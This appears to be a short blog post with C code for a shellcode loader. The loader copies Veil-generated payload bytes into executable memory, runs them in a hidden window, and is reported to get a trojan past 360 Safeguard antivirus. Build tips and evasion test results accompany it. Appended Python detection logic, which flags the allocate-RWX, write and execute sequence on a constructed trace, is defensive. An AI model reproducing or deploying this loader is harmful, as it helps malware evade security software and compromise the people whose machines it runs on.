Bypassing 360 Safeguard (does not bypass Huorong)
Buchiyexiao
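#include <windows.h>
#include <stdio.h>
#include <string.h>   /* memcpy */
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // do not show a window
unsigned char shellcode[] = "veil_shellcode";   // placeholder for the Veil-generated bytes
int main(void)
{
    // Reserve and commit a region that is readable, writable and executable
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL) { return 1; }
    // Copy the bytes into the region
    memcpy(Memory, shellcode, sizeof(shellcode));
    // Call the region as a function
    ((void(*)())Memory)();
    return 0;
}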
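In VS2019, set the runtime library to Multi-threaded (/MT) beforehand; otherwise the VirtualAlloc function does not work properly. Dropping both the compiled exe and a directly generated Windows exe trojan into a virtual machine showed that the directly generated Windows exe was detected and removed, while the exe built with this evasion step got past 360 Safeguard (Huorong detected and deleted both outright).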
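The loader above leaves a simple behavioural trace regardless of what the bytes are: a private allocation with PAGE_EXECUTE_READWRITE, a write into it, then execution from it. The following detection logic is an added example, not part of the original post; the event tuple format, the event names and the sample trace are constructed for illustration and need to be mapped onto what your EDR or ETW collector actually emits.

```python
"""Flag the allocate-RWX / write / execute sequence in an API-call trace."""

PAGE_EXECUTE_READWRITE = 0x40  # flProtect value the loader passes to VirtualAlloc

# Constructed sample trace (hypothetical format): (pid, event, address, size, protect)
SAMPLE_TRACE = [
    (100, "alloc", 0x1F0000, 0x1000, 0x04),  # ordinary read/write page
    (200, "alloc", 0x2A0000, 0x1000, 0x40),  # RWX private allocation
    (200, "write", 0x2A0000, 0x200, None),   # bytes copied into the region
    (100, "exec", 0x401000, None, None),     # normal execution, not in a tracked region
    (200, "exec", 0x2A0000, None, None),     # control transferred into the RWX region
    (300, "alloc", 0x3B0000, 0x2000, 0x40),  # RWX but never written or executed
]


def find_rwx_exec(trace):
    """Return [(pid, base)] for regions allocated RWX, then written, then executed."""
    regions = {}  # (pid, base) -> {"size": int, "written": bool}
    hits = []
    for pid, event, addr, size, protect in trace:
        if event == "alloc":
            if protect == PAGE_EXECUTE_READWRITE:
                regions[(pid, addr)] = {"size": size, "written": False}
            continue
        # For write/exec events, find the tracked region (same pid) containing addr.
        for (rpid, base), info in regions.items():
            if rpid != pid or not (base <= addr < base + info["size"]):
                continue
            if event == "write":
                info["written"] = True
            elif event == "exec" and info["written"] and (pid, base) not in hits:
                hits.append((pid, base))
    return hits


if __name__ == "__main__":
    for pid, base in find_rwx_exec(SAMPLE_TRACE):
        print(f"pid {pid}: execution from written RWX region at {base:#x}")
```

Requiring all three steps in order keeps processes that merely allocate RWX memory, such as pid 300 in the sample, out of the alert set.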